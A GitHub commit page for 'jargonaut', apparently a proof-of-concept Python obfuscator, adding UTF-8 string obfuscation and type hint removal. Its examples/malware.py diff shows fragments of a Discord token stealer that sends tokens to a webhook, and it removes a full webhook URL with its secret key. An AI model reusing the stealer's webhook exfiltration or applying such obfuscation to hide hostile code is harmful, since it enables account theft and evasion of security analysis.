Add UTF-8 based string obfuscation and uipdated examples

mad-cat-lon · Aug 7, 2024 · bbcb15f · bbcb15f
1 parent a45d438
commit bbcb15f
Show file tree

Hide file tree

Showing 8 changed files with 665 additions and 410 deletions.
diff --git a/README.md b/README.md
@@ -13,7 +13,7 @@ Note that this is a proof-of-concept and a work in progress. You should not be u
 ## Features
 - Basic variable, function, class and argument renaming 
 - Obfuscation of function return values with bytecode patching (Python versions <3.10 ONLY due to [PEP 659](https://peps.python.org/pep-0659/) changing how the interpreter works)
-- String obfuscation with lambda expressions 
+- String obfuscation with lambda expressions and UTF8 encoding
 - Dummy argument/variable insertion 
 - Basic obfuscation of calls to builtin functions with `getattr`, e.g `print` becomes `getattr(__builtins__, breakpoint.__name__[5]+StopAsyncIteration.__name__[12]+issubclass.__name__[0]+credits.__class__.__name__[4]+AssertionError.__name__[5])`
 - Obfuscation of arithmetic/bitwise expressions to [linear mixed boolean arithmetic expressions](https://link.springer.com/chapter/10.1007/978-3-540-77535-5_5)
@@ -27,12 +27,14 @@ Note that this is a proof-of-concept and a work in progress. You should not be u
   ```
 - Super basic insertion of [static opaque predicates](https://arxiv.org/pdf/1909.01640.pdf) into function bodies, reusing MBA functionality from before 
 - Comment removal 
+- Type hint removal
+
 
 ## Planned improvements
 ### Upcoming features 
 - ~Comment removal~
 - Array transformation (and transformation of other data to arrays)
-- Type hint removal
+- ~Type hint removal~
 - Polynomial MBA expressions and more advanced obfuscation rules (**coming soon**)
 - Renaming class methods and attributes (**in progress**)
 - Opaque predicates/expressions (**in progress**)

diff --git a/examples/malware.py b/examples/malware.py
@@ -5,7 +5,7 @@
 from urllib.request import Request, urlopen
 
 # your webhook URL
-WEBHOOK_URL = 'https://discord.com/api/webhooks/1143740759867134023/SM6cWUvu4TkLy7CAxVigCH_YLA0mERaU7tRWPsWPbM3IoRoFziu3QzZNcxbfJ0yu4Z2l'
+WEBHOOK_URL = 'https://discord.com/api/webhooks/example_key'
 
 # mentions you when you get a hit
 PING_ME = False
@@ -26,8 +26,8 @@ def find_tokens(path):
     return tokens
 
 def main():
-    local = os.getenv('LOCALAPPDATA')
-    roaming = os.getenv('APPDATA')
+    local = os.getenv('LOCALAPPDATA', "")
+    roaming = os.getenv('APPDATA', "")
 
     paths = {
         'Discord': roaming + '\\Discord',

diff --git a/examples/obfus_example.py b/examples/obfus_example.py
diff --git a/examples/obfus_malware.py b/examples/obfus_malware.py
diff --git a/jargonaut.py b/jargonaut.py
@@ -148,6 +148,8 @@ def main():
             ),
             # Obfuscate builtin calls
             data.HideBuiltinCalls(),
+            # Convert strings to UTF-8 encoded ints
+            data.StringToUTF8Int(),
             # Transform integers to linear MBAs
             data.ConstIntToLinearMBA(
                 n_terms_range=[5, 8],
@@ -156,7 +158,7 @@ def main():
             # data.VirtualizeFuncs(
             #     targets=["square_list"],
             #     inference=do_inference
-            # ),
+            # )
             # Replace string literals with lambda functions
             data.StringToLambdaExpr(),
             # Remove comments
@@ -167,7 +169,7 @@ def main():
             layout.RandomizeNames(),
             # Randomize methods and attributes
             layout.RandomizeAttributes(),
-            # Remove annotations
+            # # Remove annotations
             layout.RemoveAnnotations()
 
         ]

diff --git a/jargonaut/transformations/data/__init__.py b/jargonaut/transformations/data/__init__.py
@@ -1,4 +1,5 @@
 from jargonaut.transformations.data.expr_mba import ExprToLinearMBA
 from jargonaut.transformations.data.int_mba import ConstIntToLinearMBA
 from jargonaut.transformations.data.lambda_string import StringToLambdaExpr
-from jargonaut.transformations.data.hide_builtin_calls import HideBuiltinCalls
+from jargonaut.transformations.data.hide_builtin_calls import HideBuiltinCalls
+from jargonaut.transformations.data.utf8_string import StringToUTF8Int
diff --git a/jargonaut/transformations/data/mba_utils.py b/jargonaut/transformations/data/mba_utils.py
@@ -166,7 +166,7 @@ def constant_to_mba(k, n_terms, as_obj=True):
     # p(q(k)) == q(0 + p(k)) == q(zero_id_mba + p(k))
 
     # we need to account for variable bit lengths in python
-    n = random.randint(k.bit_length() + 1, 100)
+    n = random.randint(k.bit_length() + 1, 1000)
     coeffs = generate_invertible_affine(n)
     # Let's build the expression now
     # Make args random strings to prevent clashes